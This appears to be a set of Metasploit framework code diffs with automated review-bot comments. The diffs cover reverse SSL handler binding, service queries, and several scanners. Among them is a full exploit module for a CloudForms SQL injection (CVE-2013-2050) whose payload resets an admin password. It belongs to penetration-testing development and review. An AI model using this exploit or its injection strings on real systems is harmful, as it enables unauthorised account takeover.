super
register_advanced_options(
[
OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)'])
OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']),
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ])
], Msf::Handler::ReverseTcpSsl)
end
@ -59,13 +61,6 @@ module ReverseTcpSsl
end
ex = false
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
comm = datastore['ReverseListenerComm']
if comm.to_s == "local"
@ -74,20 +69,16 @@ module ReverseTcpSsl
comm = nil
end
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
local_port = bind_port
addrs = bind_address
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs.each { |ip|
begin
comm.extend(Rex::Socket::SslTcp)
self.listener_sock = Rex::Socket::SslTcpServer.create(
'LocalHost' => datastore['LHOST'],
'LocalPort' => datastore['LPORT'].to_i,
'LocalHost' => ip,
'LocalPort' => local_port,
'Comm' => comm,
'SSLCert' => datastore['SSLCert'],
'Context' =>
@ -108,16 +99,43 @@ module ReverseTcpSsl
via = ""
end
print_status("Started reverse SSL handler on #{ip}:#{datastore['LPORT']} #{via}")
print_status("Started reverse SSL handler on #{ip}:#{local_port} #{via}")
break
rescue
ex = $!
print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}")
print_error("Handler failed to bind to #{ip}:#{local_port}")
end
}
raise ex if (ex)
end
protected
def bind_port
port = datastore['ReverseListenerBindPort'].to_i
port > 0 ? port : datastore['LPORT'].to_i
end
def bind_address
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs
end
end
end
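Review bot: `bind_address` here repeats the `addrs == "::0"` Array-vs-String comparison from the other handlers in this commit, so a `ReverseListenerBindAddress` of `::0` (or `::`) is never normalised; `addrs[0] = any if %w[0.0.0.0 ::0 ::].include?(addrs[0])` is the intended check. Switching the listener from `datastore['LHOST']` to the loop's `ip` is the right fix for the any-address fallback, but it deserves a one-line comment on the `create` call (`# ip is LHOST first, then the any-address fallback from bind_address`) because a reader of the surrounding `addrs.each` will otherwise not see why the loop exists. The enclosing `setup_handler` starts outside the hunk.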


@ -449,6 +449,9 @@ class Module
ch = self.compat['Nop']
elsif (mod.type == MODULE_PAYLOAD)
ch = self.compat['Payload']
if self.respond_to?("target") and self.target['Payload'] and self.target['Payload']['Compat']
ch = ch.merge(self.target['Payload']['Compat'])
end
else
return true
end
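Review bot: The new guard `self.respond_to?("target") and self.target['Payload'] and self.target['Payload']['Compat']` assumes `target` never returns nil; if an exploit has no target selected, `self.target['Payload']` raises NoMethodError on nil instead of skipping the merge. Suggest `if self.respond_to?("target") && self.target && self.target['Payload'] && self.target['Payload']['Compat']`, and prefer `&&` over `and` here so the precedence matches what the condition reads as. Whether `target` can be nil at this point is decided by the exploit mixin's accessor, which is outside the hunk, so worth confirming before relying on the current form.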


@ -1,5 +1,6 @@
module Msf::Post::Windows
require 'msf/core/post/windows/error'
require 'msf/core/post/windows/accounts'
require 'msf/core/post/windows/cli_parse'
require 'msf/core/post/windows/eventlog'



@ -306,6 +306,50 @@ module Services
handle["GetLastError"]
end
end
#
# Query Service Status
#
# @param (see #service_start)
#
# @return {} representing lpServiceStatus
#
# @raise (see #service_start)
#
#
def service_status(name, server=nil)
adv = session.railgun.advapi32
ret = nil
# 0x80000000 GENERIC_READ
open_sc_manager(:host => server, :access => 0x80000000) do |manager|
# Now to grab a handle to the service.
handle = adv.OpenServiceA(manager, name, 0x80000000)
if (handle["return"] == 0)
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
end
status = adv.QueryServiceStatus(handle["return"],28)
if (status["return"] == 0)
raise RuntimeError.new("Could not query service. QueryServiceStatus error: #{handle["GetLastError"]}")
end
vals = status['lpServiceStatus'].unpack('L*')
adv.CloseServiceHandle(handle["return"])
ret = {
:type => vals[0],
:state => vals[1],
:controls_accepted => vals[2],
:win32_exit_code => vals[3],
:service_exit_code => vals[4],
:check_point => vals[5],
:wait_hint => vals[6]
}
end
return ret
end
end
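Review bot: The QueryServiceStatus failure path in `service_status` reports the wrong error — it interpolates `handle["GetLastError"]` (the OpenServiceA result) instead of `status["GetLastError"]` — and it raises before `CloseServiceHandle`, so every failed query leaks the service handle; wrap the query in `begin/ensure` so the handle is closed on both paths. The open also requests `GENERIC_READ` (0x80000000) where `SERVICE_QUERY_STATUS` (0x0004) is all this call needs; narrowing it is least-privilege and may succeed on hardened services where GENERIC_READ is denied, though that is worth testing against the caller's expectations. The `@return {}` tag should name the shape, e.g. `@return [Hash] SERVICE_STATUS fields keyed :type, :state, :controls_accepted, :win32_exit_code, :service_exit_code, :check_point, :wait_hint`.
```ruby
      handle = adv.OpenServiceA(manager, name, 0x80000000)
      if (handle["return"] == 0)
        raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
      end
      begin
        status = adv.QueryServiceStatus(handle["return"], 28)
        if (status["return"] == 0)
          raise RuntimeError.new("Could not query service. QueryServiceStatus error: #{status["GetLastError"]}")
        end
        vals = status['lpServiceStatus'].unpack('L*')
      ensure
        # Release the handle whether or not the query succeeded.
        adv.CloseServiceHandle(handle["return"])
      end
      # … unchanged: build the ret hash from vals …
```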
end


@ -1040,6 +1040,7 @@ def self.to_vba(framework,code,opts={})
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_exepatharray] = Rex::Text.rand_text_alpha(rand(8)+8)
# Specify the payload in hex as an extra file..
payload_hex = exe.unpack('H*')[0]


@ -1,4 +1,5 @@
# -*- coding: binary -*-
require 'metasm'
module Rex
module ElfScan
@ -27,6 +28,26 @@ class Generic
rva = hit[0]
message = hit[1].is_a?(Array) ? hit[1].join(" ") : hit[1]
$stdout.puts elf.ptr_s(rva) + " " + message
if(param['disasm'])
message.gsub!("; ", "\n")
if message.include?("retn")
message.gsub!("retn", "ret")
end
begin
d2 = Metasm::Shellcode.assemble(Metasm::Ia32.new, message).disassemble
rescue Metasm::ParseError
d2 = Metasm::Shellcode.disassemble(Metasm::Ia32.new, [message].pack('H*'))
end
addr = 0
while ((di = d2.disassemble_instruction(addr)))
disasm = "0x%08x\t" % (rva + addr)
disasm << di.instruction.to_s
$stdout.puts disasm
addr = di.next_addr
end
end
end
end
@ -203,4 +224,3 @@ end
end
end
end
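Review bot: `message.gsub!("; ", "\n")` and `message.gsub!("retn", "ret")` rewrite the string in place, and when `hit[1]` is a String that is the very object stored in the hits array (only the Array case builds a fresh string via `join`), so enabling `disasm` silently alters the scan results for anything that inspects them afterwards. Use the non-destructive form `message = message.gsub("; ", "\n").gsub("retn", "ret")`, which also makes the `include?("retn")` pre-check unnecessary. The `begin/rescue Metasm::ParseError` fallback deserves a comment on what it distinguishes, e.g. `# message is either Ia32 assembly text (assemble it) or a hex string (decode and disassemble)`, because `[message].pack('H*')` on non-hex input produces garbage bytes rather than an error. The enclosing `scan` method starts outside the hunk.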


@ -27,6 +27,10 @@ class Def_advapi32
def self.create_dll(dll_path = 'advapi32')
dll = DLL.new(dll_path, ApiConstants.manager)
dll.add_function('QueryServiceStatus', 'DWORD', [
['LPVOID', 'hService', 'in'],
['PBLOB', 'lpServiceStatus', 'out']])
dll.add_function('CredEnumerateA', 'BOOL', [
['PCHAR', 'Filter', 'in'],
['DWORD', 'Flags', 'in'],
@ -2089,10 +2093,8 @@ class Def_advapi32
["PBLOB","pvContext","in"],
])
return dll
end
end
end; end; end; end; end; end; end


@ -130,7 +130,7 @@ class Metasploit3 < Msf::Auxiliary
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>|
template = template.gsub(/^\t\t/, '')
template = template.gsub(/^ {4}/, '')
template = template.gsub(/\n/, '')
connect


@ -0,0 +1,175 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'bcrypt'
require 'digest'
require 'openssl'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability in the "explorer"
action of "miq_policy" controller of the Red Hat CloudForms Management
Engine 5.1 (ManageIQ Enterprise Virtualization Manager 5.0 and earlier) by
changing the password of the target account to the specified password.
},
'Author' => 'Ramon de C Valle',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-2050'],
['CWE', '89'],
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=959062']
],
'DefaultOptions' =>
{
'SSL' => true
},
'DisclosureDate' => 'Nov 12 2013'
)
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [true, 'Your username']),
OptString.new('PASSWORD', [true, 'Your password']),
OptString.new('TARGETUSERNAME', [true, 'The username of the target account', 'admin']),
OptString.new('TARGETPASSWORD', [true, 'The password of the target account', 'smartvm']),
OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST'] ])
], self.class
)
end
def password_for_newer_schema
# Newer versions use ActiveModel's SecurePassword.
BCrypt::Password.create(datastore['TARGETPASSWORD'])
end
def password_for_older_schema
# Older versions use ManageIQ's MiqPassword.
if datastore['TARGETPASSWORD'].empty?
'v1:{}'
else
password = '1234567890123456'
salt = '6543210987654321'
cipher = OpenSSL::Cipher.new('AES-256-CBC')
cipher.encrypt
cipher.key = Digest::SHA256.digest("#{salt}#{password}")[0...32]
encrypted = cipher.update(datastore['TARGETPASSWORD']) + cipher.final
"v1:{#{Rex::Text.encode_base64(encrypted)}}"
end
end
def password_reset?
print_status("Trying to log into #{target_url('dashboard')} using the target account...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'dashboard', 'authenticate'),
'vars_post' => {
'user_name' => datastore['TARGETUSERNAME'],
'user_password' => datastore['TARGETPASSWORD']
}
)
if res.nil?
print_error('No response from remote host')
return false
end
if res.body =~ /"Error: (.*)"/
print_error($1)
false
else
true
end
end
def run
print_status("Logging into #{target_url('dashboard')}...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'dashboard', 'authenticate'),
'vars_post' => {
'user_name' => datastore['USERNAME'],
'user_password' => datastore['PASSWORD']
}
)
if res.nil?
print_error('No response from remote host')
return
end
if res.body =~ /"Error: (.*)"/
print_error($1)
return
else
session = $1 if res.headers['Set-Cookie'] =~ /_vmdb_session=(\h*)/
if session.nil?
print_error('Failed to retrieve the current session id')
return
end
end
# Newer versions don't accept POST requests.
print_status("Sending password-reset request to #{target_url('miq_policy', 'explorer')}...")
send_request_cgi(
'cookie' => "_vmdb_session=#{session}",
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'miq_policy', 'explorer'),
'vars_get' => {
'profile[]' => value_for_newer_schema
}
)
if password_reset?
print_good('Password reset successfully')
return
else
print_error('Failed to reset password')
end
print_status("Sending (older-schema) password-reset request to #{target_url('miq_policy', 'explorer')}...")
send_request_cgi(
'cookie' => "_vmdb_session=#{session}",
'method' => datastore['HTTP_METHOD'],
'uri' => normalize_uri(target_uri.path, 'miq_policy', 'explorer'),
"vars_#{datastore['HTTP_METHOD'].downcase}" => {
'profile[]' => value_for_older_schema
}
)
if password_reset?
print_good('Password reset successfully')
else
print_error('Failed to reset password')
end
end
def target_url(*args)
(ssl ? 'https' : 'http') +
if rport.to_i == 80 || rport.to_i == 443
"://#{vhost}"
else
"://#{vhost}:#{rport}"
end + normalize_uri(target_uri.path, *args)
end
def value_for_newer_schema
"1 = 1); UPDATE users SET password_digest = '#{password_for_newer_schema}' WHERE userid = '#{datastore['TARGETUSERNAME']}' --"
end
def value_for_older_schema
"1 = 1); UPDATE users SET password = '#{password_for_older_schema}' WHERE userid = '#{datastore['TARGETUSERNAME']}' --"
end
end

@ -77,6 +77,10 @@ class Metasploit3 < Msf::Auxiliary
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty?
raise Msf::OptionValidateError.new(['PORTS'])
end
ports.each_with_index do |port,i|
p.tcp_dst = port
p.tcp_src = rand(64511)+1024

@ -0,0 +1,116 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/dns/resolver'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS Non-Recursive Record Scraper',
'Description' => %q{
This module can be used to scrape records that have been cached
by a specific nameserver. The module allows the user to test
every record from a specified file.
},
'Author' => [
'Brandon McCann "zeknox" <bmccann[at]accuvant.com>',
'Rob Dixon "304geek" <rob.dixon[at]accuvant.com>'
],
'License' => MSF_LICENSE,
'References' => [
['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html'],
['URL', 'http://www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf']
]))
register_options([
OptString.new('DOMAIN', [ false, "Domain name to query for"]),
OptPath.new('WORDLIST', [ false, "Wordlist for domain name queries", ::File.join(Msf::Config.data_directory, "wordlists", "av-update-urls.txt")]),
OptAddress.new('NS', [ true, "Specify the nameserver to use for queries" ]),
], self.class)
register_advanced_options([
OptBool.new('TCP_DNS', [false, "Run queries over TCP", false]),
OptInt.new('DNS_TIMEOUT', [true, "DNS Timeout in seconds", 5])
], self.class)
end
# method to scrape dns
def scrape_dns(domain)
# dns request with recursive disabled
use_tcp = datastore['TCP_DNS']
res = Net::DNS::Resolver.new(:nameservers => "#{datastore['NS']}", :recursive => false, :use_tcp => use_tcp)
use_tcp ? res.tcp_timeout = datastore['DNS_TIMEOUT'] : res.udp_timeout = datastore['DNS_TIMEOUT']
# query dns
begin
query = res.send(domain)
rescue ResolverArgumentError
print_error("Invalid domain: #{domain}")
return
rescue NoResponseError
print_error("DNS Timeout Issue: #{domain}")
return
end
# found or not found
if query.answer.empty?
vprint_status("#{domain} - Not Found")
return
end
@is_vulnerable = true
print_good("#{domain} - Found")
report_goods(domain)
end
# method to read each line from file
def read_file
::File.open("#{datastore['WORDLIST']}", "rb").each_line do |line|
scrape_dns(line.chomp)
end
end
# log results to database
def report_goods(domain)
if datastore['TCP_DNS']
proto = "tcp"
else
proto = "udp"
end
report_note(
:host => datastore['NS'],
:name => "dns",
:port => 53,
:proto => proto,
:type => "dns.cache.scrape",
:data => "#{domain} cached",
:update => :unique_data
)
end
# main control method
def run
@is_vulnerable = false
print_status("Making queries against #{datastore['NS']}")
if datastore['DOMAIN'].blank?
read_file
else
scrape_dns(datastore['DOMAIN'])
end
report_vuln(
:host => datastore['NS'],
:name => "DNS Cache Snooping",
) if @is_vulnerable
end
end
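Review bot: `read_file` opens the wordlist with `::File.open("#{datastore['WORDLIST']}", "rb").each_line` and no block, so the handle is never closed and is left to the garbage collector; `::File.foreach(datastore['WORDLIST']) { |line| scrape_dns(line.chomp) }` iterates the lines and closes the file itself. `run` calls `read_file` whenever DOMAIN is blank, but WORDLIST is registered as optional, so an unset WORDLIST reaches `File.open` with an empty path and fails with an opaque ENOENT rather than an option error — a guard in the style this commit uses elsewhere, `raise Msf::OptionValidateError.new(['WORDLIST']) if datastore['WORDLIST'].nil?`, before the read would make that explicit. The ternary with assignments in `scrape_dns`, `use_tcp ? res.tcp_timeout = ... : res.udp_timeout = ...`, is hard to read and is clearer as an `if use_tcp ... else ... end` statement. The `rescue ResolverArgumentError` / `rescue NoResponseError` constants are unqualified; presumably they resolve through net/dns, but worth confirming they are not meant to be namespaced under `Net::DNS::Resolver`.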

@ -0,0 +1,68 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::Udp
def initialize
super(
'Name' => 'Chargen Probe Utility',
'Description' => %q{
Chargen is a debugging and measurement tool and a character
generator service. A character generator service simply sends
data without regard to the input.
Chargen is susceptible to spoofing the source of transmissions
as well as use in a reflection attack vector. The misuse of the
testing features of the Chargen service may allow attackers to
craft malicious network payloads and reflect them by spoofing
the transmission source to effectively direct it to a target.
This can result in traffic loops and service degradation with
large amounts of network traffic.
},
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '1999-0103' ], # Note, does not actually trigger a flood.
[ 'URL', 'https://www.cert.be/pro/docs/chargensnmp-ddos-attacks-rise' ],
[ 'URL', 'http://tools.ietf.org/html/rfc864' ],
],
'DisclosureDate' => 'Feb 08 1996')
register_options([
Opt::RPORT(19)
])
deregister_options('RHOST')
end
def run_host(rhost)
begin
connect_udp
pkt = Rex::Text.rand_text_alpha_lower(1)
udp_sock.write(pkt)
r = udp_sock.recvfrom(65535, 0.1)
if r and r[1]
vprint_status("#{rhost}:#{rport} - Response: #{r[0].to_s}")
res = r[0].to_s.strip
if (res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) || res.match(/0123456789/))
print_good("#{rhost}:#{rport} answers with #{res.length} bytes (headers + UDP payload)")
report_service(:host => rhost, :port => rport, :name => "chargen", :info => res.length)
end
end
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
nil
ensure
disconnect_udp if self.udp_sock
end
end
end
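Review bot: The response check in `run_host`, `if (res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) || res.match(/0123456789/))`, builds MatchData objects only to get a boolean, and the same test is added in the udp_sweep and udp_probe sections of this commit as `chargen_parse` with `data =~ /ABCDEFGHIJKLMNOPQRSTUVWXYZ|0123456789/i`; using that single expression here keeps the three chargen checks consistent. `if r and r[1]` uses the low-precedence `and` and should be `if r && r[1]`. The `rescue ... nil` for HostUnreachable/ConnectionTimeout/ConnectionRefused silently drops those hosts, which is the usual best-effort scanner behaviour, but a `vprint_status` there would make a fully silent run diagnosable.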

@ -46,6 +46,7 @@ class Metasploit3 < Msf::Auxiliary
@probes << 'probe_pkt_citrix'
@probes << 'probe_pkt_pca_st'
@probes << 'probe_pkt_pca_nq'
@probes << 'probe_chargen'
end
@ -204,6 +205,11 @@ class Metasploit3 < Msf::Auxiliary
case pkt[2]
when 19
app = 'chargen'
return unless chargen_parse(pkt[0])
@results[hkey] = true
when 53
app = 'DNS'
ver = nil
@ -362,6 +368,13 @@ class Metasploit3 < Msf::Auxiliary
"#{res[2]}_#{res[1]}"
end
#
# Validate a chargen packet.
#
def chargen_parse(data)
data =~ /ABCDEFGHIJKLMNOPQRSTUVWXYZ|0123456789/i
end
#
# Validate this is truly Citrix ICA; returns true or false.
#
@ -397,6 +410,11 @@ class Metasploit3 < Msf::Auxiliary
# The probe definitions
#
def probe_chargen(ip)
pkt = Rex::Text.rand_text_alpha_lower(1)
return [pkt, 19]
end
def probe_pkt_dns(ip)
data = [rand(0xffff)].pack('n') +
"\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+
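Review bot: `chargen_parse` and `probe_chargen` are added verbatim to both this module and the udp_probe module in the next section, so the two copies will drift unless they are kept in sync; if the two modules share a mixin this is a candidate for it, otherwise a comment in each pointing at the other copy would at least flag the duplication. `probe_chargen` does not need the explicit `return [pkt, 19]`; `[pkt, 19]` as the last expression is the idiomatic form (the `ip` parameter is unused, which matches the `probe_pkt_dns(ip)` signature below and is fine). `chargen_parse` returns a match offset or nil rather than true/false, which works with the `return unless chargen_parse(...)` callers but is worth stating in its header comment, e.g. `# Returns the match offset (truthy) for a chargen-looking payload, nil otherwise.`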

@ -41,6 +41,7 @@ class Metasploit3 < Msf::Auxiliary
@probes << 'probe_pkt_citrix'
@probes << 'probe_pkt_pca_st'
@probes << 'probe_pkt_pca_nq'
@probes << 'probe_chargen'
end
def setup
@ -153,6 +154,12 @@ class Metasploit3 < Msf::Auxiliary
case sport
when 19
app = 'chargen'
ver = nil
return unless chargen_parse(data)
@results[hkey] = true
when 53
app = 'DNS'
ver = nil
@ -306,6 +313,13 @@ class Metasploit3 < Msf::Auxiliary
print_status("Discovered #{app} on #{shost}:#{sport} (#{inf})")
end
#
# Validate a chargen packet.
#
def chargen_parse(data)
data =~ /ABCDEFGHIJKLMNOPQRSTUVWXYZ|0123456789/i
end
#
# Parse a db2disco packet.
#
@ -349,6 +363,11 @@ class Metasploit3 < Msf::Auxiliary
# The probe definitions
#
def probe_chargen(ip)
pkt = Rex::Text.rand_text_alpha_lower(1)
return [pkt, 19]
end
def probe_pkt_dns(ip)
data = [rand(0xffff)].pack('n') +
"\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+

@ -56,6 +56,10 @@ class Metasploit3 < Msf::Auxiliary
dead = false
portlist = Rex::Socket.portspec_crack(datastore['PORTS'])
if portlist.empty?
raise Msf::OptionValidateError.new(['PORTS'])
end
vprint_status("[#{rhost}] Verifying manual testing is not required...")
manual = false

@ -162,7 +162,7 @@ class Metasploit3 < Msf::Auxiliary
if (res and res.body)
short_name = res.body.scan(/<INPUT NAME=\"ShortName\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
user_mail = res.body.scan(/<INPUT NAME=\"InternetAddress\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
pass_hash = res.body.scan(/<INPUT NAME=\"dspHTTPPassword\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
pass_hash = res.body.scan(/<INPUT NAME=\"\$?dspHTTPPassword\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
if short_name.to_s.strip.empty?
short_name = 'NULL'

@ -0,0 +1,101 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Poison Ivy Command and Control Scanner',
'Description' => %q{
Enumerate Poison Ivy Command and Control (C&C) on ports 3460, 80, 8080 and 443. Adaptation of iTrust Python script.
},
'References' =>
[
['URL', 'www.malware.lu/Pro/RAP002_APT1_Technical_backstage.1.0.pdf'],
],
'Author' => ['SeawolfRN'],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('PORTS', [true, "Ports to Check","80,8080,443,3460"]),
OptInt.new('TIMEOUT', [true, "The socket connect timeout in milliseconds", 1000]),
OptInt.new('CONCURRENCY', [true, "The number of concurrent ports to check per host", 10])
], self.class)
deregister_options('RPORT')
end
def run_host(ip)
timeout = datastore['TIMEOUT'].to_i
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty?
raise Msf::OptionValidateError.new(['PORTS'])
end
while(ports.length > 0)
t = []
r = []
begin
1.upto(datastore['CONCURRENCY']) do
this_port = ports.shift
break if not this_port
t << framework.threads.spawn("Module(#{self.refname})-#{ip}:#{this_port}", false, this_port) do |port|
begin
s = connect(false,
{
'RPORT' => port,
'RHOST' => ip,
'ConnectTimeout' => (timeout / 1000.0)
}
)
r << [ip,port,"open",'Unknown']
s.puts("\x00"*0x100,0) #Send 0x100 zeros, wait for answer
data = s.get_once(0x100)
if data.length == 0x100
data = s.get_once(0x4)
if data == "\xD0\x15\x00\x00" #Signature for PIVY C&C
print_status("#{ip}:#{port} - C&C Server Found")
r << [ip,port,"open",'Poison Ivy C&C']
end
end
rescue ::Rex::ConnectionRefused
vprint_status("#{ip}:#{port} - TCP closed")
r << [ip,port,"closed",'']
rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error
rescue ::Rex::Post::Meterpreter::RequestError
raise $!
ensure
disconnect(s) rescue nil
end
end
end
t.each {|x| x.join }
rescue ::Timeout::Error
ensure
t.each {|x| x.kill rescue nil }
end
r.each do |res|
report_service(:host => res[0], :port => res[1], :state => res[2], :name=> res[3])
end
end
end
end
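Review bot: `data = s.get_once(0x100)` can return nil when the peer closes without sending anything, and `data.length` on the next line then raises NoMethodError, which none of the rescue clauses (ConnectionRefused, ConnectionError/IOError/Timeout, RequestError) cover, so the spawned thread dies with a backtrace instead of the port being recorded; guard it with `if data && data.length == 0x100`. `s.puts("\x00"*0x100,0)` passes a stray second argument `0`: if `s` behaves like a plain IO, `puts` writes each argument followed by a newline, so the probe would not be the bare 0x100 zero bytes the trailing comment describes — presumably `s.put("\x00" * 0x100)` was intended; worth confirming against what the signature check expects. `r << [ip,port,"open",'Unknown']` is pushed before the probe and the `'Poison Ivy C&C'` entry is pushed again on a match, so a detected host gets two `report_service` calls for the same port; setting a local `name` and pushing once after the probe avoids that. `rescue ::Rex::Post::Meterpreter::RequestError; raise $!` can simply be a bare `raise`.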

@ -50,8 +50,7 @@ class Metasploit3 < Msf::Auxiliary
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty?
print_error("Error: No valid ports specified")
return
raise Msf::OptionValidateError.new(['PORTS'])
end
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0

@ -43,8 +43,7 @@ class Metasploit3 < Msf::Auxiliary
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty?
print_error("Error: No valid ports specified")
return
raise Msf::OptionValidateError.new(['PORTS'])
end
datastore['RHOST'] = datastore['BOUNCEHOST']

@ -48,8 +48,7 @@ class Metasploit3 < Msf::Auxiliary
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty?
print_error("Error: No valid ports specified")
return
raise Msf::OptionValidateError.new(['PORTS'])
end
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0

@ -41,8 +41,7 @@ class Metasploit3 < Msf::Auxiliary
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty?
print_error("Error: No valid ports specified")
return
raise Msf::OptionValidateError.new(['PORTS'])
end
while(ports.length > 0)

@ -50,8 +50,7 @@ class Metasploit3 < Msf::Auxiliary
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty?
print_error("Error: No valid ports specified")
return
raise Msf::OptionValidateError.new(['PORTS'])
end
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0

@ -28,8 +28,8 @@ class Metasploit3 < Msf::Auxiliary
],
'Author' =>
[
'Royce Davis @R3dy_ <rdavis[at]accuvant.com>',
'Brandon McCann @zeknox <bmccann[at]accuvant.com>'
'Royce Davis "R3dy" <rdavis[at]accuvant.com>',
'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
],
'License' => MSF_LICENSE
))

@ -9,7 +9,8 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
VALID_HOSTNAME_REGEX = /^(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\-]*[A-Za-z0-9])$/
def initialize
super(
@ -36,8 +37,9 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptAddress.new('SAPROUTER_HOST', [true, 'SAPRouter address', '']),
OptPort.new('SAPROUTER_PORT', [true, 'SAPRouter TCP port', '3299']),
OptAddress.new('RHOST', [true, 'SAPRouter address', '']),
OptPort.new('RPORT', [true, 'SAPRouter TCP port', '3299']),
OptString.new('TARGETS', [true, 'Comma delimited targets. When resolution is local address ranges or CIDR identifiers allowed.', '']),
OptEnum.new('MODE', [true, 'Connection Mode: SAP_PROTO or TCP ', 'SAP_PROTO', ['SAP_PROTO', 'TCP']]),
OptString.new('INSTANCES', [false, 'SAP instance numbers to scan (NN in PORTS definition)', '00-99']),
OptString.new('PORTS', [true, 'Ports to scan (e.g. 3200-3299,5NN13)', '32NN']),
@ -47,10 +49,9 @@ class Metasploit3 < Msf::Auxiliary
# 3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002,
# 8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN
OptInt.new('CONCURRENCY', [true, 'The number of concurrent ports to check per host', 10]),
OptEnum.new('RESOLVE',[true,'Where to resolve TARGETS','local',['remote','local']])
], self.class)
deregister_options('RPORT')
end
# Converts a instance specification like "4,21-23,33" into a sorted,
@ -253,6 +254,14 @@ class Metasploit3 < Msf::Auxiliary
vprint_error("#{ip}:#{port} - invalid route")
when /reacheable/
vprint_error("#{ip}:#{port} - unreachable")
when /hostname '#{ip}' unknown/
vprint_error("#{ip}:#{port} - unknown host")
when /GetHostByName: '#{ip}' not found/
vprint_error("#{ip}:#{port} - unknown host")
when /connection to .* timed out/
vprint_error("#{ip}:#{port} - connection timed out")
